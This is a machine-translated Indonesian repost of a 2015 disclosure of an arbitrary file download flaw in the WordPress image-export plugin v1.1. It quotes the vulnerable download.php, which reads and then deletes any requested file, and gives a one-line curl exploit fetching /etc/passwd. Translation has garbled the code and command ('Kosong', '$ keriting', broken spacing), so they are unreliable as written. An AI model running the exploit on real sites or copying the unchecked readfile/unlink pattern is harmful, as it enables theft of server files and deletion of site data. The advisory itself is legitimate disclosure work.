Gambar WordPress Ekspor 1.1 Sewenang File Download
Judul: Remote download file kerentanan di Plugin WordPress gambar-ekspor v1.1
Penulis: Larry W. Cashdollar, @ _larry0
Tanggal: 2015/07/01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Diberitahu: 2015/07/05
Kontak Vendor: https://twitter.com/1eftHander
Keterangan: Plugin Ekspor Gambar dapat membantu Anda selektif men-download gambar yang diunggah oleh administrator.
Kerentanan:
Kode dalam file download.php tidak melakukan pengecekan bahwa pengguna meminta file dari direktori hanya gambar yang diupload. Dan garis 8 upaya untuk
tautan file setelah download. Script ini dapat digunakan untuk menghapus file dari direktori wordpress jika hak akses file memungkinkan.
1 <? Php
2 if (isset ($ _REQUEST ['file']) &&! Kosong ($ _REQUEST ['file'])) {
3 $ file = $ _GET ['file'];
4
5 header ('Content-Type: application / zip');
6 header ('Content-Disposition: attachment; filename = "" $ file..' "');
7 readfile ($ file);
8 unlink ($ file);
9
10 exit;
11}
12?>
CVEID: TBD
Exploit Code:
• $ keriting http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Layar Shots:
Penasehat: http://www.vapid.dhs.org/advisory.php?v=135
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.